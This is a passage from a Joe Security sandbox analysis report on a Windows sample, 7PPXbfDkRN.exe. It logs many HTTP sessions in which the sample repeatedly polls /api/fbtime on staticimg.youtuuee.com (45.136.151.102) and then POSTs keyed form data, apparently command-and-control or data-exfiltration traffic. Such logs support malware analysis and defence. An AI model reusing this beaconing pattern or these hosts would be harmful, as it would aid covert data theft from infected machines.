1442 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 36 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 49 51 4e 7a 37 6a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151265,"time":1635061614,"rand_str":"IQNz7j"}0

Oct 24, 2021 09:46:54.211215019 CEST

1442 OUT POST /api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:54.366297960 CEST

1443 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

41 192.168.2.5 49795 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:54.667601109 CEST

1444 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:54.817378044 CEST

1444 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 48 71 65 56 78 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151319,"time":1635061614,"rand_str":"RHqeVx"}0

Oct 24, 2021 09:46:54.836503983 CEST

1444 OUT POST /api/?sid=2151319&key=1a5f4c87eb0f37dc049eed9c4db37b02 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 47 of 58

Page 48: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:54.991520882 CEST

1445 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

42 192.168.2.5 49796 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:55.309187889 CEST

1446 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:55.454819918 CEST

1446 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 35 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 72 41 59 4b 52 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151359,"time":1635061615,"rand_str":"RrAYKR"}0

Oct 24, 2021 09:46:55.464891911 CEST

1447 OUT POST /api/?sid=2151359&key=8e5b3dc2ab7f04f2eb1218fc34b05518 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:55.617041111 CEST

1447 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

43 192.168.2.5 49797 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:55.933140039 CEST

1448 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:56.081788063 CEST

1449 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 49 45 52 65 35 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151395,"time":1635061615,"rand_str":"hIERe5"}0

Oct 24, 2021 09:46:56.098254919 CEST

1449 OUT POST /api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 48 of 58

Page 49: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:56.249144077 CEST

1450 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

44 192.168.2.5 49798 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:56.575320005 CEST

1451 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:56.724689960 CEST

1451 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 37 34 4e 57 47 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151425,"time":1635061616,"rand_str":"74NWGq"}0

Oct 24, 2021 09:46:56.739645004 CEST

1451 OUT POST /api/?sid=2151425&key=ac504e0e07f53c6f4b545780dc221950 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:56.894335032 CEST

1452 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

45 192.168.2.5 49799 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:57.241782904 CEST

1453 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:57.387552977 CEST

1453 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 32 6b 61 45 51 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151471,"time":1635061617,"rand_str":"2kaEQU"}0

Oct 24, 2021 09:46:57.398885012 CEST

1454 OUT POST /api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 49 of 58

Page 50: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

46 192.168.2.5 49800 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

47 192.168.2.5 49801 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

48 192.168.2.5 49802 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

49 192.168.2.5 49803 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

5 192.168.2.5 49753 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:17.334026098 CEST

1329 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:17.487363100 CEST

1330 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 79 54 41 42 68 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149425,"time":1635061577,"rand_str":"RyTABh"}0

Oct 24, 2021 09:46:17.528027058 CEST

1330 OUT POST /api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8dd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:17.678673983 CEST

1331 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

50 192.168.2.5 49804 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 50 of 58

Page 51: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

51 192.168.2.5 49805 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

52 192.168.2.5 49806 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

53 192.168.2.5 49807 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

54 192.168.2.5 49808 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

55 192.168.2.5 49810 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

56 192.168.2.5 49814 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

57 192.168.2.5 49818 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

58 192.168.2.5 49821 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

59 192.168.2.5 49825 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

6 192.168.2.5 49754 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Copyright Joe Security LLC 2021 Page 51 of 58

Page 52: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:18.505224943 CEST

1332 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:18.648884058 CEST

1332 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 39 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 61 5a 56 68 63 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149491,"time":1635061578,"rand_str":"4aZVhc"}0

Oct 24, 2021 09:46:18.781927109 CEST

1332 OUT POST /api/?sid=2149491&key=a900675f9a8d56a24a79c8f6976efc9f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:18.936049938 CEST

1333 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

60 192.168.2.5 49829 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

61 192.168.2.5 49832 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

62 192.168.2.5 49836 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

63 192.168.2.5 49840 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

64 192.168.2.5 49844 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

65 192.168.2.5 49845 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Copyright Joe Security LLC 2021 Page 52 of 58

Page 53: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

66 192.168.2.5 49846 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

67 192.168.2.5 49847 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

68 192.168.2.5 49848 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

69 192.168.2.5 49849 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

7 192.168.2.5 49755 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:20.000674009 CEST

1334 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:20.147985935 CEST

1334 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 35 34 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 41 6d 64 43 72 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149549,"time":1635061580,"rand_str":"KAmdCr"}0

Oct 24, 2021 09:46:20.284533978 CEST

1335 OUT POST /api/?sid=2149549&key=ef8fb823e4ca08a782cf605473692aff HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:20.434596062 CEST

1335 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

70 192.168.2.5 49850 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Copyright Joe Security LLC 2021 Page 53 of 58

Page 54: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

71 192.168.2.5 49851 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

72 192.168.2.5 49852 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

73 192.168.2.5 49853 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

74 192.168.2.5 49856 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

75 192.168.2.5 49857 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

76 192.168.2.5 49858 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

77 192.168.2.5 49859 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

78 192.168.2.5 49860 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

79 192.168.2.5 49861 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 54 of 58

Page 55: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

8 192.168.2.5 49756 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:21.431983948 CEST

1336 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:21.582541943 CEST

1337 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 6b 4b 6e 35 62 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149615,"time":1635061581,"rand_str":"5kKn5b"}0

Oct 24, 2021 09:46:21.678189993 CEST

1337 OUT POST /api/?sid=2149615&key=2891fe78238bcde026f8e178fbf9a3c7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:21.834268093 CEST

1338 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

80 192.168.2.5 49862 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

81 192.168.2.5 49863 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

82 192.168.2.5 49869 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

83 192.168.2.5 49870 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

84 192.168.2.5 49871 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Copyright Joe Security LLC 2021 Page 55 of 58

Page 56: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Session ID Source IP Source Port Destination IP Destination Port Process

85 192.168.2.5 49872 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

86 192.168.2.5 49873 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

87 192.168.2.5 49874 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

88 192.168.2.5 49875 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

89 192.168.2.5 49876 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

9 192.168.2.5 49757 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:22.728864908 CEST

1339 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:22.873564959 CEST

